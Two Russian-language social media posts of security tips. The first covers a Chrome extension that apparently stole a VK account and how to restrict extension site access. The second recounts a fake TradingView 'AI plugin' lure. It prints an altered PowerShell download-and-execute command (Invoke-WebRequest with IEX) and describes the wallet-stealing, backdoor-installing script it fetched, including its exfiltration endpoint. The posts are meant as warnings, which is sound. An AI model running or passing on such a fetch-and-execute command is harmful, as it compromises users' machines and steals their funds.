Купить или продать? Ошибка при выборе кнопок

Еще немного опыта в области ИБ и лайфхаков как избежать потерь аккаунтов и своих данных. Когда то по работе поставил себе pixelperfect расширение первое попавшееся на глаза из интернет-магазина chrome. И жил с ним долго. ВК пользовался заходя в него раз в месяц. В какой то момент заметил, что во блоке chrome, которая открывается на F12 во вкладке network постоянно улетают дополнительно запросы на какой-то сторонний ресурс. И как итог у меня увели ВК, сменили телефон там и у меня была долгая эпопея по возврату моего аккаунта. Произошло это потому что любое браузерное расширение может получать доступ ко всем заполняемым полям в том числе логину и паролю. Ну и вообще ко всему, что может сейчас js с web api. Допустим смотреть видео с камеры ноутбука хорошо, что это не так интересно злоумышленникам да и потребуется разрешение от пользователя, но мы же не всегда смотрим, что там спрашивают) Лайфхак: браузерные расширения используются обычно для какого то определенного ресурса, но если оно установлено, то по умолчанию добавляет свой код, если его не заблокировать следующим образом: нажимаем правой кнопкой на него -> Расширение может получать доступ к данным сайта и изменять их -> выбираем при нажатии на расширение. А там где нам это нужно расширение проходим тот же путь, но выбираем, что разрешить для этого сайта. Лайфхак2: можно создавать разные профили. Например, для работы, для отдыха и инвестирования в самом chrome, что тоже даст надежную изоляцию @Softline_Official #софтлайнитлайфхак

@Softline_Official #софтлайнитлайфхак Хотел описать немножко своего недавнего опыта. Повелся на выглядищим правдиво ролик о переводе TradingView в develop режим с добавлением ИИ плагинов (зачем и как на это повелся вопрос хороший и сам не знаю видимо просто попали в нужное время под нужный настрой) Предлагалось после установки скачать плагин через скрипт. Я его изменил, чтобы не распространять это powershell -Command "$TradingView='V3'; $InstallPackage='TradingViewDev'; $mode='developer'; $TradingView+$mode+'-AI; $ux='TradingView'; $DEVELOPER='True'; $Response=Invoke-WebRequest -Uri $AI -UseBasicParsing -UserAgent $ux; $Plugin=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Рlugin" Я что-то лихо подмахнул. Мне ответили, что сервер временно не доступен и попробуйте позже Но благо я сразу задумался, а почему такая запутанная команда и начал разбираться с ней. В этой команде он скачивает скрипт с сервера и запускает у тебя на компьютере в powershell(по факту ты видишь стандартное ожидание и потом вывод ошибки). Этот скрипт у тебя на компьютере сканирует папки на наличие аппаратных кошельков и отправляет их списком с названием твоего компьютера на сайт злоумышленника developer-update.dev/info2.php, а потом скачивает троян-бэкдор для доступа к твоему компьютеру в тихом режиме, который помещает в AppData/NS/client32.exe и в реестр добавляет его на автозапуск. В конце подчищает следы удаляя все лишнее, чтобы остался необходимый минимум и отправляет сообщение, что сервер занят попробуй позже. Встроенный антивирусник в винду с последними обновами это скушал и не заметил. VirusTotal показывает, что некоторые антивирусы его палят. Брэндмаузер у меня отключен по рабочим причинам. В моем случае обошлось, т.к. среагировал сразу отключив инет от этого компа и пошел разбираться с командой на другом Вывод: досконально проверяйте, что запускаете прежде чем это сделать. Особенно ни в коем случае не запускать скрипты с командой IEX *** это как раз и запускает выполнение стороннего кода на твоей машине Лайфхак: если сами не можете разобраться, то просите помощи у различных ИИ помощников Лайфхак2: можно поставить виртуальную ОСь(винду, линь) и тестить сначала там, если есть малейшее подозрение